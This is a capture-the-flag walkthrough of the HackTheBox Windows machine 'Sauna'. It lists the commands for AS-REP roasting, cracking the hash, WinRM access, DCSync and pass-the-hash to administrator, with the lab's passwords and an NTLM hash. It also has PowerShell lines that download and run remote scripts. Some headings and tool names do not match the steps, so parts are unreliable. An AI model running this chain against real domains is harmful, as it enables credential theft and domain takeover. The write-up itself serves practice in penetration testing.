Technology is just a tool. In terms of getting the kids working together and motivating them, the teacher is the most important. <Bill Gates>


03 Jan 2020


Sauna is an easy difficulty Windows machine from HacktheBox, it requires on the Active Directory enumeration technique and CVE exploitation, for training your ethical hacking skills and penetration testing skills.

Possible usernames can be found on the website that can be used on an ASREPRoasting attack. A password hash is found and the plaintext password was recovered by an offline brute force attack. This user credential is able to WinRM to the box.

Running WinPEAS reveals the possible path for the Privilege Escalation (PE), the result shows that there a system user has been configured to automatically log in and this user has Windows remote management permissions.

[email protected]

Target Machine:

Attacking (Hacker) machine:

Penetrating Methodology:

Service Scanning

  • Nmap


  • Nikto

  • Dirb

  • ldapsearch

  • nmap -p 88 --script krb5-enum-users

  • nmap -p 389 --script ldap-rootdse



  • Ysoserial

Getting Less Privilege Shell

  • Sherlock

  • Windows-Exploit-Suggester

Hacking Process Part 0 – Service Scanning

The target machine IP is Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Details Analysis

nmap -n -sV -vv --open -Pn -p- -A --reason -oN nmap.txt sauna.htb

Enumeration strategies

  1. Check Website Vulnerability

  2. Check any hidden files/folders of the website

  3. Check SMB

Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Vulnerability

Nikto -- no vulnerability can be abused to bypass authentication.

1.2) Strategy 1 Check any hidden files/folders of the website

python3 /root/Documents/ctf/tools/dirsearch/ -u -e php,txt -x 301,302,403,404 --simple-report=mrRobot.dirsearch

1.3) LDAP

nmap -p 389 --script ldap-rootdse sauna.htb


nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICAL-BANK.local' sauna.htb

ldapsearch -x -h sauna.htb -b "DC=EGOTISTICAL-BANK,DC=local"


shauncoins,scooin, shaunc

hugobear,hbear, hugob

bowietaylor,btaylor, bowiet

sophiedriver,sdriver, sophied


/usr/share/doc/python3-impacket/examples/ EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt -no-pass -outputfile getNPUsers.result -dc-ip sauna.htb

john fsmith.tgt -format:krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt

fsmith: Thestrokes23

Hacking Process Part 2 – Get Low Privilege Access

2.1) OAuth Token Exploitation

smbmap -u fsmith -p Thestrokes23 -H sauna.htb -R

no user.txt found in share folder.


evil-winrm.rb -u fsmith -p Thestrokes23 -i sauna.htb

Hacking Process Part 3 – Windows Privilege Escalation

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(''); Find-AllVulns -Command 'start powershell.exe'"

No vulnerabile items found

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');

/root/Documents/ctf/tools/win/evil-winrm/evil-winrm.rb -u svc_loanmanager -p Moneymakestheworldgoround! -i sauna.htb

incorrect user name

/root/Documents/ctf/tools/win/evil-winrm/evil-winrm.rb -u svc_loanmgr -p Moneymakestheworldgoround! -i sauna.htb

/usr/share/doc/python3-impacket/examples/ 'svc_loanmgr:[email protected]'


/root/Documents/ctf/tools/win/evil-winrm/evil-winrm.rb -u administrator --hash 500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff -i



一開始getnpuser dump到hash是因為剛好fsmith呢個user個account有check到not required kerberos pre authentication,所以可以用呢個account來gen ticket dump到個hash,又剛好個account用weak password破解到,所以羅到user

root就svc_loanmgr呢個service account讀到ad個db,所以dump到個db羅曬hash

by default not requured kerberos authentication係無check到的,一般是app唔support kerberos,所以要check

Reference Link